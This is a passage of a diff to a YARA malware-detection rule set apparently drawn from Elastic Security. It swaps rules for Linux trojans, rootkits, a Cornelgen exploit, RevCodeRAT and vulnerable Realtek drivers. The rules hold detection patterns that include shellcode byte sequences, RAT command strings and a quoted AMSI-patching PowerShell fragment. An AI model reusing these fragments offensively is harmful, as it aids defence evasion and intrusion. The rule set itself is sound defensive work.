"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Downloader_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e511efb068e76a4a939c2ce2f2f0a089ef55ca56ee5f2ba922828d23e6181f09" + logic_hash = "c9558562d9e9d3b55bd1fba9e55b332e6b4db5a170e0dd349bef1e35f0c7fd21" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e7a2a6240d6f7396505cc2203c03d4ae93a7ef0c0c956cef7a390b4303a2cbe" + fingerprint = "67e14ea693baee8437157f6e450ac5e469b1bab7d9ff401493220575aae9bc91" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100268,28 +100778,28 @@ rule ELASTIC_Linux_Trojan_Psybnc_563Ecb11 : FILE MEMORY os = "linux" strings: - $a = { 5F 65 6E 00 6B 6F 5F 65 6E 00 72 75 5F 65 6E 00 65 73 5F 65 6E 00 44 } + $a = { 89 D0 83 C0 01 EB 05 B8 FF FF FF FF 48 8B 5D E8 64 48 33 1C 25 28 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Psybnc_Ab3396D5 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Skidmap_Aa7B661D : FILE MEMORY { meta: - description = "Detects Linux Trojan Psybnc (Linux.Trojan.Psybnc)" + description = "Detects Linux Trojan Skidmap (Linux.Trojan.Skidmap)" author = "Elastic Security" - id = "ab3396d5-388b-4730-9a55-581c327a2769" + id = "aa7b661d-0ecc-4171-a0c2-a6c0c91b6d27" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Psybnc.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c5ec84e7cc891af25d6319abb07b1cedd90b04cbb6c8656c60bcb07e60f0b620" - logic_hash = "8c083f66fc252a88395bb954a67d710d64f5b68efb9df4b60b260302874b400a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Skidmap.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4282ba9b7bee69d42bfff129fff45494fb8f7db0e1897fc5aa1e4265cb6831d9" + logic_hash = "aa976158d004d582234a92ff648d4581440f9c933a0abef212d9d837d9607ba4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1180e02d3516466457f48dc614611a6949a4bf21f6a294f6384892db30dc4171" + fingerprint = "0bd6bec14d4b0205b04c6b4f34988ad95161f954a1f0319dd33513cb2c7e5f59" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100297,28 +100807,28 @@ rule ELASTIC_Linux_Trojan_Psybnc_Ab3396D5 : FILE MEMORY os = "linux" strings: - $a = { 53 54 00 55 53 45 52 4F 4E 00 30 00 50 25 64 00 58 30 31 00 } + $a = { E8 41 41 80 F8 1A 41 0F 43 C1 88 04 0E 48 83 C1 01 0F B6 04 0F } condition: all of them } -rule ELASTIC_Linux_Trojan_Psybnc_F07357F1 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Cornelgen_584A227A : FILE MEMORY { meta: - description = "Detects Linux Trojan Psybnc (Linux.Trojan.Psybnc)" + description = "Detects Linux Exploit Cornelgen (Linux.Exploit.Cornelgen)" author = "Elastic Security" - id = "f07357f1-1a92-4bd7-a43d-7a75fb90ac83" - date = "2021-01-12" + id = "584a227a-bf17-4620-8b10-97676f12ea5b" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Psybnc.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f77216b169e8d12f22ef84e625159f3a51346c2b6777a1fcfb71268d17b06d39" - logic_hash = "cfe217fe108de787600d1ef06ac6738d84aedfc46e5632143692a9f83cb62df7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Cornelgen.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c823cb669f1d6cb9258d6f0b187609c226af23396f9c5be26eb479e5722a9d97" + logic_hash = "db3b6bbab48074449ae8b404f8fa77d93cde1ab8e57bd4ad981ac2afb8226494" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f0f1008fec444ce25d80f9878a04d9ebe9a76f792f4be8747292ee7b133ea05c" + fingerprint = "65a23e20166b99544b2d0b4969240618d50e80a53a69829756721e19e4e6899f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100326,120 +100836,86 @@ rule ELASTIC_Linux_Trojan_Psybnc_F07357F1 : FILE MEMORY os = "linux" strings: - $a = { F7 EA 89 D0 C1 F8 02 89 CF C1 FF 1F 29 F8 8D 04 80 01 C0 29 C1 8D } + $a = { 6E 89 E3 52 53 89 E1 B0 0B CD 80 31 C0 40 CD 80 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Sleepobfloader_460A1A75 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Cornelgen_Be0Bc02D : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sleepobfloader (Windows.Hacktool.SleepObfLoader)" + description = "Detects Linux Exploit Cornelgen (Linux.Exploit.Cornelgen)" author = "Elastic Security" - id = "460a1a75-7242-41d6-8b39-51f2f0276a33" - date = "2024-01-24" - modified = "2024-01-29" - reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SleepObfLoader.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "84b3bc58ec04ab272544d31f5e573c0dd7812b56df4fa445194e7466f280e16d" - logic_hash = "c0bc1b7ef71c1a91fc487f904315c6f187530ab39825f90f55ac36625d5b93cf" + id = "be0bc02d-2d9d-4cbe-9d6a-3a88ffa1234b" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Cornelgen.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "24c0ba8ad4f543f9b0aff0d0b66537137bc78606b47ced9b6d08039bbae78d80" + logic_hash = "67c4f2d875f233b52fcbc24d9225c51af4dc09c27ce3915f0d756202bd4e5867" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8dbba5af9f379ac16a79b4989067b8715e084490ae2f048eb3a28d8d33c716e9" + fingerprint = "6b57eb6fd3c8e28cbff5e7cc51246de74ca7111a9cd1c795b21aa89142a693b4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { BA 01 00 00 00 41 B8 20 01 00 00 8B 48 3C 8B 4C 01 28 48 03 C8 48 89 0D ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? B9 01 00 00 00 } - $b = { 8A 50 20 83 60 24 F0 80 E2 F8 48 8B ?? ?? ?? 4C 8B ?? ?? ?? 48 89 08 48 8B ?? ?? ?? 48 89 48 08 } - $c = { 8B 46 FB 41 89 40 18 0F B7 46 FF 66 41 89 40 1C 8A 46 01 41 88 40 1E } + $a = { 8B 44 24 08 A3 B8 9F 04 08 0F B7 05 04 A1 04 08 } condition: all of them } -rule ELASTIC_Windows_Trojan_Deimos_F53Aee03 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Cornelgen_03Ee53D3 : FILE MEMORY { meta: - description = "Detects Windows Trojan Deimos (Windows.Trojan.Deimos)" + description = "Detects Linux Exploit Cornelgen (Linux.Exploit.Cornelgen)" author = "Elastic Security" - id = "f53aee03-74c3-4b40-8ae4-4f1bf35f88c8" - date = "2021-09-18" - modified = "2022-01-13" - reference = "https://www.elastic.co/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Deimos.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e" - logic_hash = "07675844a8790f8485b6545e7466cdef8ac4f92dec4cd8289aeaad2a0a448691" + id = "03ee53d3-4f03-4c5e-9187-45e0e33584b4" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Cornelgen.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "711eafd09d4e5433be142d54db153993ee55b6c53779d8ec7e76ca534b4f81a5" + logic_hash = "e7d9c66621ad3c56f3bb8150c17b10495053d9485b2143750aeefd3c55ab7943" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "12a6d7f9e4f9a937bf1416443dd0d5ee556ac1f67d2b56ad35f9eac2ee6aac74" + fingerprint = "f2a8ecfffb0328c309a3a5db7e62fae56bf168806a1db961a57effdebba7645e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "\\APPDATA\\ROAMING" wide fullword - $a2 = "{\"action\":\"ping\",\"" wide fullword - $a3 = "Deimos" ascii fullword + $a = { C9 B0 27 CD 80 31 C0 B0 3D CD 80 31 C0 8D 5E 02 } condition: - all of ($a*) + all of them } -rule ELASTIC_Windows_Trojan_Deimos_C70677B4 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Revcoderat_8E6D4182 : FILE MEMORY { meta: - description = "Detects Windows Trojan Deimos (Windows.Trojan.Deimos)" + description = "Detects Windows Trojan Revcoderat (Windows.Trojan.Revcoderat)" author = "Elastic Security" - id = "c70677b4-f5ba-440b-ba31-31e80caee2fe" - date = "2021-09-18" + id = "8e6d4182-4ea8-4d4c-ad3a-d16b42e387f4" + date = "2021-09-02" modified = "2022-01-13" - reference = "https://www.elastic.co/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Deimos.yar#L24-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e" - logic_hash = "c969221f025b114b9d5738d43b6021ab9481dbc6b35eb129ea4f806160b1adc3" - score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "ffe0dec3585da9cbb9f8a0fac1bb6fd43d5d6e20a6175aaa889ae13ef2ed101f" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "windows" - - strings: - $a1 = { 00 57 00 58 00 59 00 5A 00 5F 00 00 17 75 00 73 00 65 00 72 00 } - $a2 = { 0C 08 16 1F 68 9D 08 17 1F 77 9D 08 18 1F 69 9D 08 19 1F 64 9D } - - condition: - 1 of ($a*) -} -rule ELASTIC_Windows_Rootkit_R77_5Bab748B : FILE MEMORY -{ - meta: - description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" - author = "Elastic Security" - id = "5bab748b-8576-4967-9b50-a3778db1dd71" - date = "2022-03-04" - modified = "2022-04-12" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Rootkit_R77.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cfc76dddc74996bfbca6d9076d2f6627912ea196fdbdfb829819656d4d316c0c" - logic_hash = "ebf851ef41fde8e3118acc742cd2b38651f662a00f11dd6f7c65cf56019c43d5" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Revcoderat.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "77732e74850050bb6f935945e510d32a0499d820fa1197752df8bd01c66e8210" + logic_hash = "35626d752b291e343350534aece35f1d875068c2c050d12312a60e67753c71e1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2523d25c46bbb9621f0eceeda10aff31e236ed0bf03886de78524bdd2d39cfaa" + fingerprint = "bc259d888e913dffb4272e2f871592238eb78922989d30ac4dc23cdeb988cc78" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -100447,247 +100923,238 @@ rule ELASTIC_Windows_Rootkit_R77_5Bab748B : FILE MEMORY os = "windows" strings: - $a = { 01 04 10 41 8B 4A 04 49 FF C1 48 8D 41 F8 48 D1 E8 4C 3B C8 } + $a1 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin already exists, skipping download!" ascii fullword + $a2 = "TARGET_HOST_UPDATE(): Sync successful!" ascii fullword + $a3 = "WEBCAM_ACTIVATE: Plugin already exists, skipping download!" ascii fullword + $a4 = "send_keylog_get" ascii fullword condition: all of them } -rule ELASTIC_Windows_Rootkit_R77_Eb366Abc : FILE MEMORY +rule ELASTIC_Linux_Rootkit_Arkd_Bbd56917 : FILE MEMORY { meta: - description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" + description = "Detects Linux Rootkit Arkd (Linux.Rootkit.Arkd)" author = "Elastic Security" - id = "eb366abc-d256-4dd2-ad97-898fdf905b8a" - date = "2023-05-09" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Rootkit_R77.yar#L22-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "21e7f69986987fc75bce67c4deda42bd7605365bac83cf2cecb25061b2d86d4f" - logic_hash = "3d6f1c60bf749c53f4a4fcfd6490d309e4450d5f7e64de4665c3d80af1bce44f" + id = "bbd56917-aeab-4e73-b85b-adc41fc7ffe4" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Rootkit_Arkd.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e0765f0e90839b551778214c2f9ae567dd44838516a3df2c73396a488227a600" + logic_hash = "5e1ce9c37d92222e21b43f9e5f3275a70c6e8eb541c3762f9382c5d5c72fb50d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "beaa87877382a0cba0fcad6397b22bef2ff6dad8e3454ae517b529fbc76ff97a" + fingerprint = "73c8b2685b6b568575afca3c3c2fe2095d94f2040f4a1207974fe77bbb657163" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 8C 20 88 00 00 00 42 8B 44 21 10 42 8B 4C 21 1C 48 2B D0 49 } - $a2 = { 53 00 4F 00 46 00 54 00 57 00 41 00 52 00 45 00 5C 00 24 00 37 00 37 00 63 00 6F 00 6E 00 66 00 69 00 67 00 } + $a = { 7D 0B B8 FF FF FF FF EB 11 8D 74 26 00 39 C1 7F 04 31 C0 EB 05 B8 01 00 } condition: all of them } -rule ELASTIC_Windows_Rootkit_R77_99050E7D : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Rtkio_13B3C88B : FILE { meta: - description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" + description = "Name: rtkio.sys" author = "Elastic Security" - id = "99050e7d-b9b2-411f-b315-0ac7f556314c" - date = "2023-05-09" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Rootkit_R77.yar#L44-L64" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3dc94c88caa3169e096715eb6c2e6de1b011120117c0a51d12f572b4ba999ea6" - logic_hash = "0fedf4698cc652076090b1fe256d05d2c0bc3ad2ab7ed5faa270c5c7fe0efca1" + id = "13b3c88b-daa7-4402-ad31-6fc7d4064087" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Rtkio.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82" + logic_hash = "1e37650292884e28dcc51c42bc1b1d1e8efc13b0727f7865ff1dc7b8e1a72380" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "1fa724556616eed4adfe022602795ffc61fe64dd910b5b83fd7610933b79d71f" - severity = 100 + tags = "FILE" + fingerprint = "3788e6a7a759796a2675116e4d291324f97114773cf53345f15796566266f702" + threat_name = "Windows.VulnDriver.Rtkio" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 24 00 37 00 37 00 63 00 68 00 69 00 6C 00 64 00 70 00 72 00 6F 00 63 00 36 00 34 00 } - $a2 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 24 00 37 00 37 00 63 00 68 00 69 00 6C 00 64 00 70 00 72 00 6F 00 63 00 33 00 32 00 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 74 00 6B 00 69 00 6F 00 2E 00 73 00 79 00 73 00 00 00 } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Windows_Rootkit_R77_Be403E3C : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Rtkio_D595781E : FILE { meta: - description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" + description = "Name: rtkio64.sys" author = "Elastic Security" - id = "be403e3c-a70d-4126-b464-83060138c79b" - date = "2023-05-18" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Rootkit_R77.yar#L66-L85" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "91c6e2621121a6871af091c52fafe41220ae12d6e47e52fd13a7b9edd8e31796" - logic_hash = "efbf924c7a299f2543c639b6262007eb3bdbf6ff5e33dab7d6102814b9477811" + id = "d595781e-67c1-47bf-a7ea-bb4a9ba33879" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Rtkio.yar#L22-L41" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7" + logic_hash = "289eb17025d989cc74e109b1c03378e9760817a84f1a759153ff6ff6b6401e6d" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "46fd9d53771a0c6d14b364589a7cfa291a1c0405d74a97beac75db78faea7e0b" - severity = 100 + tags = "FILE" + fingerprint = "efe0871703d5c146764c4a7ac9c80ae4e635dc6dd0e718e6ddc4c39b18ca9fdd" + threat_name = "Windows.VulnDriver.Rtkio" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a = { 33 C9 48 89 8C 24 C0 00 00 00 4C 8B CB 48 89 8C 24 B8 00 00 00 45 33 C0 48 89 8C 24 B0 00 00 00 48 89 8C 24 A8 00 00 00 89 8C 24 A0 00 00 00 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 74 00 6B 00 69 00 6F 00 36 00 34 00 2E 00 73 00 79 00 73 00 20 00 00 00 } condition: - $a + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Windows_Rootkit_R77_Ee853C9F : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Rtkio_B09Af431 : FILE { meta: - description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" + description = "Name: rtkiow8x64.sys" author = "Elastic Security" - id = "ee853c9f-97ec-45b2-8c67-7b86331f4946" - date = "2023-05-18" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Rootkit_R77.yar#L87-L112" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "916c805b0d512dd7bbd88f46632d66d9613de61691b4bd368e4b7cb1f0ac7f60" - logic_hash = "94f080f310ecace76da32ba2b4edcc80dedfb339113823708167c1d842db8cf3" + id = "b09af431-307b-40e2-bac5-5865c1ad54c8" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Rtkio.yar#L43-L62" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038" + logic_hash = "916a6e63dc4c7ee0bfdf4a455ee467a1d03c1042db60806511aa7cbf3b096190" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "a2bf137ff29044a1f80494aa4b51bd7aa49ae64808b9f1d4566750b9717b847d" - severity = 100 + tags = "FILE" + fingerprint = "e62a497acc1ee04510aa42ca96c5265e16b3be665f99e7dfc09ecc38055aca5b" + threat_name = "Windows.VulnDriver.Rtkio" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $r77_str0 = "$77stager" wide fullword - $r77_str1 = "$77svc32" wide fullword - $r77_str2 = "$77svc64" wide fullword - $r77_str3 = "\\\\.\\pipe\\$77childproc64" wide fullword - $r77_str4 = "SOFTWARE\\$77config" - $obfuscate_ps = { 0F B7 04 4B 33 D2 C7 45 FC 34 00 00 00 F7 75 FC 66 8B 44 55 90 66 89 04 4B 41 3B CE } - $amsi_patch_ps = "[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3)" wide fullword + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 74 00 6B 00 69 00 6F 00 77 00 38 00 78 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } condition: - ($obfuscate_ps and $amsi_patch_ps) or ( all of ($r77_str*)) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Windows_Rootkit_R77_D0367E28 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Rtkio_5693E967 : FILE { meta: - description = "Detects Windows Rootkit R77 (Windows.Rootkit.R77)" + description = "Name: rtkiow10x64.sys" author = "Elastic Security" - id = "d0367e28-2c37-45c8-8a74-7ea881f2d471" - date = "2023-05-18" - modified = "2023-06-13" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Rootkit_R77.yar#L114-L141" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "96849108e13172d14591169f8fdcbf8a8aa6be05b7b6ef396d65529eacc02d89" - logic_hash = "588b18c54c344ca267b86143df20c7dcaab081e0ef6acae0bd0dae61593eb521" + id = "5693e967-dbe4-457c-8b0c-404774871ac0" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Rtkio.yar#L64-L83" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89" + logic_hash = "4cbc7a52de7f610cdb12bf40a9099bcfae818dcb5e4119a8c34499433aeebd7e" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "c3f6fe38fcc2ec40ae7c033e37f7a2830f5d53f0e796281bd484bdb65502cd0e" - severity = 100 + tags = "FILE" + fingerprint = "4de76b2d42b523c4bfefeee8905e8f431168cb59e18049563f9942e97c276e46" + threat_name = "Windows.VulnDriver.Rtkio" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $str0 = "service_names" wide fullword - $str1 = "process_names" wide fullword - $str2 = "tcp_local" wide fullword - $str3 = "tcp_remote" wide fullword - $str4 = "startup" wide fullword - $str5 = "ReflectiveDllMain" ascii fullword - $str6 = ".detourd" ascii fullword - $binary0 = { 48 8B 10 48 8B 0B E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 08 48 8B 4B 08 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 10 48 8B 4B 10 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 18 48 8B 4B 18 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 20 48 8B 4B 20 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 57 28 48 8B 4B 28 E8 ?? ?? ?? ?? 85 C0 } - $binary1 = { 8B 56 04 8B 4F 04 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 08 8B 4F 08 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 0C 8B 4F 0C E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 10 8B 4F 10 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 14 8B 4F 14 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 18 8B 4F 18 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 56 1C 8B 4F 1C } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 72 00 74 00 6B 00 69 00 6F 00 77 00 31 00 30 00 78 00 36 00 34 00 2E 00 73 00 79 00 73 00 20 00 00 00 } condition: - ( all of ($str*)) or $binary0 or $binary1 + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name } -rule ELASTIC_Windows_Trojan_Smokeloader_4E31426E : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Gmer_8Aabdd5E : FILE { meta: - description = "Detects Windows Trojan Smokeloader (Windows.Trojan.Smokeloader)" + description = "Detects Windows Hacktool Gmer (Windows.Hacktool.Gmer)" author = "Elastic Security" - id = 